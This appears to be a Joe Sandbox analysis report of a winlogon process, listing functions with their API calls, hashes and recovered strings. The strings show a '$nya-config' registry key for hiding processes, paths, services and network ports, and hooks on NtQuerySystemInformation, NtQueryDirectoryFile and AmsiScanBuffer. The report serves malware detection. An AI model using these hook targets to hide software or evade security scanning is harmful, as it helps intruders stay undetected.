Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 39bfdc35c05c2da688e871ec03857e5e59a8f41f8762b74fc6440781aae357b5
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 82A181327286C1CDFB219B75E8843FDBBA1ABC1B95F1441369E9D27A99DE3CC4418704

Function 000001E85898DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001E85898DB99
FindNextFileW.KERNEL32 ref: 000001E85898DCCF
FindClose.KERNEL32 ref: 000001E85898DD0F
FindClose.KERNEL32 ref: 000001E85898DD3B

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 963440828cc21e4634c97c586a2df5feb5c02742c35c082937db3c822ac295a7
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 0AA194327246C2C9FB619B75E8847FDBBA1ABC17A4F144136DE9D27A99DE38C441CB00

Function 000001E858988090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001E8589880BC
GetCurrentThreadId.KERNEL32 ref: 000001E8589880CA
GetCurrentProcessId.KERNEL32 ref: 000001E8589880D6
QueryPerformanceCounter.KERNEL32 ref: 000001E8589880E6

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: c77e519a094b9b0240037eda345fc8aefee7c7299a40a0a0ee56151f6d40b724
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 4E111836721B44CAEB00CB60E8553AD73A4FB19758F440E32DE6D867A4DF78C154C340

Function 000001E8589ED894 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001E8589ED220: HeapAlloc.KERNEL32(?,?,00000000,000001E8589EC987), ref: 000001E8589ED275

Part of subcall function 000001E8589F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E8589F0EEB

FindFirstFileExW.KERNEL32 ref: 000001E8589EDB99

Part of subcall function 000001E8589ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2B6
Part of subcall function 000001E8589ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2C0

Strings

!-M, xrefs: 000001E8589EDA32

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID: !-M
API String ID: 2436724071-3625753649
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 0b219f7f44031c32ea2e79fea39e3a45199b30b026899eb8a6ed5132250adf37
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 7081A2323246C0C6EB249B2AE9403EEFB91EBC5B94F544536AE9D07B95DF38C1618700

Function 000001E8589BD894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001E8589BD220: HeapAlloc.KERNEL32(?,?,00000000,000001E8589BC987), ref: 000001E8589BD275

Part of subcall function 000001E8589C0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E8589C0EEB

FindFirstFileExW.KERNEL32 ref: 000001E8589BDB99

Part of subcall function 000001E8589BD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2B6
Part of subcall function 000001E8589BD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2C0

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: d3d71621ab098274a5083b366c7b9dc780b9f7df82d5bd74f977c4b6d14aaa4f
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 2D819032329AC0CAEB24DB62E5413EEFB91EBC5B95F544136AE9D17B95DE3CC0418704

Function 000001E85898D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000001E85898D220: HeapAlloc.KERNEL32(?,?,00000000,000001E85898C987), ref: 000001E85898D275

Part of subcall function 000001E858990EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001E858990EEB

FindFirstFileExW.KERNEL32 ref: 000001E85898DB99

Part of subcall function 000001E85898D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2B6
Part of subcall function 000001E85898D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2C0

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 04adc9b0a6a2696a2b873d994df342b5533526a61dde9e8bfff30a87b450d365
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: A781A1323246C2C6EB20DB66E5417EEF7A1EBC5BA4F544136AEAD47B95DF38C0418B00

Function 000001E858962AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: fb5b7aa0220fcb614365f69b7198efa8676ca908a684f431a8bf72c4f8d97fc7
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: 671130B16345D0C7E7A99F29D4513ADB790FB4A384F84803ADC4EC7A94DF2D84918F04

Function 000001E8589B1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B172F
HeapAlloc.KERNEL32 ref: 000001E8589B173E

Part of subcall function 000001E8589B1264: GetProcessHeap.KERNEL32 ref: 000001E8589B126A
Part of subcall function 000001E8589B1264: HeapAlloc.KERNEL32 ref: 000001E8589B1279
Part of subcall function 000001E8589B1264: GetProcessHeap.KERNEL32 ref: 000001E8589B1293
Part of subcall function 000001E8589B1264: HeapAlloc.KERNEL32 ref: 000001E8589B12A4

Part of subcall function 000001E8589B1000: GetProcessHeap.KERNEL32 ref: 000001E8589B1006
Part of subcall function 000001E8589B1000: HeapAlloc.KERNEL32 ref: 000001E8589B1015
Part of subcall function 000001E8589B1000: GetProcessHeap.KERNEL32 ref: 000001E8589B1028
Part of subcall function 000001E8589B1000: HeapAlloc.KERNEL32 ref: 000001E8589B1037

RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17AE
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17DB
RegCloseKey.ADVAPI32 ref: 000001E8589B17F5
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1815
RegCloseKey.ADVAPI32 ref: 000001E8589B1830
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1850
RegCloseKey.ADVAPI32 ref: 000001E8589B186B
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B188B
RegCloseKey.ADVAPI32 ref: 000001E8589B18A6
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B18C6
RegCloseKey.ADVAPI32 ref: 000001E8589B18E1
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1901
RegCloseKey.ADVAPI32 ref: 000001E8589B191C
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B193C
RegCloseKey.ADVAPI32 ref: 000001E8589B1957
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1977
RegCloseKey.ADVAPI32 ref: 000001E8589B1992
RegCloseKey.ADVAPI32 ref: 000001E8589B199C

Part of subcall function 000001E8589B12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B1315
Part of subcall function 000001E8589B12B8: GetProcessHeap.KERNEL32 ref: 000001E8589B1323
Part of subcall function 000001E8589B12B8: HeapAlloc.KERNEL32 ref: 000001E8589B1334
Part of subcall function 000001E8589B12B8: RegEnumValueW.ADVAPI32 ref: 000001E8589B1393
Part of subcall function 000001E8589B12B8: GetProcessHeap.KERNEL32 ref: 000001E8589B13DB
Part of subcall function 000001E8589B12B8: HeapAlloc.KERNEL32 ref: 000001E8589B13E9
Part of subcall function 000001E8589B12B8: GetProcessHeap.KERNEL32 ref: 000001E8589B1406
Part of subcall function 000001E8589B12B8: HeapFree.KERNEL32 ref: 000001E8589B1414
Part of subcall function 000001E8589B12B8: lstrlenW.KERNEL32 ref: 000001E8589B141D
Part of subcall function 000001E8589B12B8: GetProcessHeap.KERNEL32 ref: 000001E8589B142B
Part of subcall function 000001E8589B12B8: HeapAlloc.KERNEL32 ref: 000001E8589B1439

Strings

paths, xrefs: 000001E8589B1884
pid, xrefs: 000001E8589B180E
service_names, xrefs: 000001E8589B18BF
SOFTWARE\$nya-config, xrefs: 000001E8589B178E
process_names, xrefs: 000001E8589B1849
udp, xrefs: 000001E8589B1970
startup, xrefs: 000001E8589B17D1
tcp_local, xrefs: 000001E8589B18FA
tcp_remote, xrefs: 000001E8589B1935

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 0174a383f8a82be9dde6690383532ac3e7002ee8ddac20e19dbe65dd89c72992
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: F371E936224A90CAEB10EF65E8947DDB7A4FF88B89F801122DE4E97B68DE35C544C740

Function 000001E8589E1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589E172F
HeapAlloc.KERNEL32 ref: 000001E8589E173E

Part of subcall function 000001E8589E1264: GetProcessHeap.KERNEL32 ref: 000001E8589E126A
Part of subcall function 000001E8589E1264: HeapAlloc.KERNEL32 ref: 000001E8589E1279
Part of subcall function 000001E8589E1264: GetProcessHeap.KERNEL32 ref: 000001E8589E1293
Part of subcall function 000001E8589E1264: HeapAlloc.KERNEL32 ref: 000001E8589E12A4

Part of subcall function 000001E8589E1000: GetProcessHeap.KERNEL32 ref: 000001E8589E1006
Part of subcall function 000001E8589E1000: HeapAlloc.KERNEL32 ref: 000001E8589E1015
Part of subcall function 000001E8589E1000: GetProcessHeap.KERNEL32 ref: 000001E8589E1028
Part of subcall function 000001E8589E1000: HeapAlloc.KERNEL32 ref: 000001E8589E1037

RegOpenKeyExW.ADVAPI32 ref: 000001E8589E17AE
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E17DB
RegCloseKey.ADVAPI32 ref: 000001E8589E17F5
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E1815
RegCloseKey.ADVAPI32 ref: 000001E8589E1830
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E1850
RegCloseKey.ADVAPI32 ref: 000001E8589E186B
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E188B
RegCloseKey.ADVAPI32 ref: 000001E8589E18A6
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E18C6
RegCloseKey.ADVAPI32 ref: 000001E8589E18E1
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E1901
RegCloseKey.ADVAPI32 ref: 000001E8589E191C
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E193C
RegCloseKey.ADVAPI32 ref: 000001E8589E1957
RegOpenKeyExW.ADVAPI32 ref: 000001E8589E1977
RegCloseKey.ADVAPI32 ref: 000001E8589E1992
RegCloseKey.ADVAPI32 ref: 000001E8589E199C

Part of subcall function 000001E8589E12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589E1315
Part of subcall function 000001E8589E12B8: GetProcessHeap.KERNEL32 ref: 000001E8589E1323
Part of subcall function 000001E8589E12B8: HeapAlloc.KERNEL32 ref: 000001E8589E1334
Part of subcall function 000001E8589E12B8: RegEnumValueW.ADVAPI32 ref: 000001E8589E1393
Part of subcall function 000001E8589E12B8: GetProcessHeap.KERNEL32 ref: 000001E8589E13DB
Part of subcall function 000001E8589E12B8: HeapAlloc.KERNEL32 ref: 000001E8589E13E9
Part of subcall function 000001E8589E12B8: GetProcessHeap.KERNEL32 ref: 000001E8589E1406
Part of subcall function 000001E8589E12B8: HeapFree.KERNEL32 ref: 000001E8589E1414
Part of subcall function 000001E8589E12B8: lstrlenW.KERNEL32 ref: 000001E8589E141D
Part of subcall function 000001E8589E12B8: GetProcessHeap.KERNEL32 ref: 000001E8589E142B
Part of subcall function 000001E8589E12B8: HeapAlloc.KERNEL32 ref: 000001E8589E1439

Strings

process_names, xrefs: 000001E8589E1849
paths, xrefs: 000001E8589E1884
udp, xrefs: 000001E8589E1970
startup, xrefs: 000001E8589E17D1
SOFTWARE\$nya-config, xrefs: 000001E8589E178E
service_names, xrefs: 000001E8589E18BF
tcp_remote, xrefs: 000001E8589E1935
pid, xrefs: 000001E8589E180E
tcp_local, xrefs: 000001E8589E18FA

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 64c81fe0a7cd359e6481c4651bad97baf2ab0a275262f099def3fe385e6f62d7
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 2F711A36720A90C6EB11AF65E8906DDB7A4FF88B89F445132DE4E57B68EF38C554C340

Function 000001E8589B1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589B1E7F

Part of subcall function 000001E8589B22A8: GetModuleHandleA.KERNEL32(?,?,?,000001E8589B1EB1), ref: 000001E8589B22C0
Part of subcall function 000001E8589B22A8: GetProcAddress.KERNEL32(?,?,?,000001E8589B1EB1), ref: 000001E8589B22D1

CreateThread.KERNEL32 ref: 000001E8589B2043
TlsAlloc.KERNEL32 ref: 000001E8589B2049
TlsAlloc.KERNEL32 ref: 000001E8589B2055
TlsAlloc.KERNEL32 ref: 000001E8589B2061
TlsAlloc.KERNEL32 ref: 000001E8589B206D
TlsAlloc.KERNEL32 ref: 000001E8589B2079
TlsAlloc.KERNEL32 ref: 000001E8589B2085

Strings

NtEnumerateKey, xrefs: 000001E8589B1F19
NtQueryDirectoryFile, xrefs: 000001E8589B1EDF
NtQuerySystemInformation, xrefs: 000001E8589B1EA5
pdh.dll, xrefs: 000001E8589B1FD7, 000001E8589B1FF8
NtResumeThread, xrefs: 000001E8589B1EC2
NtQueryDirectoryFileEx, xrefs: 000001E8589B1EFC
amsi.dll, xrefs: 000001E8589B2019
NtDeviceIoControlFile, xrefs: 000001E8589B1FB6
ntdll.dll, xrefs: 000001E8589B1E8D
PdhGetFormattedCounterArrayW, xrefs: 000001E8589B1FF1
EnumServicesStatusExW, xrefs: 000001E8589B1F71, 000001E8589B1F92
advapi32.dll, xrefs: 000001E8589B1F57, 000001E8589B1F78
sechost.dll, xrefs: 000001E8589B1F99
PdhGetRawCounterArrayW, xrefs: 000001E8589B1FD0
EnumServiceGroupW, xrefs: 000001E8589B1F50
AmsiScanBuffer, xrefs: 000001E8589B2012
NtEnumerateValueKey, xrefs: 000001E8589B1F36

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 3890a7050a7f7b596aa9a3c73e910d8044593bced606347f1359c2de54b00974
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 1A517C71234ACAE9EB14EBA4EC457DCFB20FF4034AF8049339C0D42566DE79825AC788

Function 000001E8589E1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589E1E7F

Part of subcall function 000001E8589E22A8: GetModuleHandleA.KERNEL32(?,?,?,000001E8589E1EB1), ref: 000001E8589E22C0
Part of subcall function 000001E8589E22A8: GetProcAddress.KERNEL32(?,?,?,000001E8589E1EB1), ref: 000001E8589E22D1

CreateThread.KERNEL32 ref: 000001E8589E2043
TlsAlloc.KERNEL32 ref: 000001E8589E2049
TlsAlloc.KERNEL32 ref: 000001E8589E2055
TlsAlloc.KERNEL32 ref: 000001E8589E2061
TlsAlloc.KERNEL32 ref: 000001E8589E206D
TlsAlloc.KERNEL32 ref: 000001E8589E2079
TlsAlloc.KERNEL32 ref: 000001E8589E2085

Strings

NtResumeThread, xrefs: 000001E8589E1EC2
AmsiScanBuffer, xrefs: 000001E8589E2012
PdhGetRawCounterArrayW, xrefs: 000001E8589E1FD0
ntdll.dll, xrefs: 000001E8589E1E8D
EnumServiceGroupW, xrefs: 000001E8589E1F50
sechost.dll, xrefs: 000001E8589E1F99
NtQueryDirectoryFile, xrefs: 000001E8589E1EDF
NtQuerySystemInformation, xrefs: 000001E8589E1EA5
amsi.dll, xrefs: 000001E8589E2019
NtEnumerateValueKey, xrefs: 000001E8589E1F36
EnumServicesStatusExW, xrefs: 000001E8589E1F71, 000001E8589E1F92
NtDeviceIoControlFile, xrefs: 000001E8589E1FB6
NtQueryDirectoryFileEx, xrefs: 000001E8589E1EFC
PdhGetFormattedCounterArrayW, xrefs: 000001E8589E1FF1
NtEnumerateKey, xrefs: 000001E8589E1F19
advapi32.dll, xrefs: 000001E8589E1F57, 000001E8589E1F78
pdh.dll, xrefs: 000001E8589E1FD7, 000001E8589E1FF8

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 0679d6ce0c791feeed0f6c75edd0c596b38c86b882ae33b40327a4222458b5ed
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 395176B0170ADAE6EB0AEBA4EC417DCFB20AF40748F804533AD1D06565DE78C16AC386

Function 000001E8589B12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B1315
GetProcessHeap.KERNEL32 ref: 000001E8589B1323
HeapAlloc.KERNEL32 ref: 000001E8589B1334
RegEnumValueW.ADVAPI32 ref: 000001E8589B1393

Part of subcall function 000001E8589B1530: StrCmpIW.SHLWAPI ref: 000001E8589B1561

GetProcessHeap.KERNEL32 ref: 000001E8589B13DB
HeapAlloc.KERNEL32 ref: 000001E8589B13E9
GetProcessHeap.KERNEL32 ref: 000001E8589B1406
HeapFree.KERNEL32 ref: 000001E8589B1414
lstrlenW.KERNEL32 ref: 000001E8589B141D
GetProcessHeap.KERNEL32 ref: 000001E8589B142B
HeapAlloc.KERNEL32 ref: 000001E8589B1439
StrCpyW.SHLWAPI ref: 000001E8589B145B
GetProcessHeap.KERNEL32 ref: 000001E8589B1472
HeapFree.KERNEL32 ref: 000001E8589B1480

Strings

d, xrefs: 000001E8589B1356

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: c26919a39b6f19c3673957ef411dbc7f76c1d98ffb3b278101d1cf87e9ab1a55
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
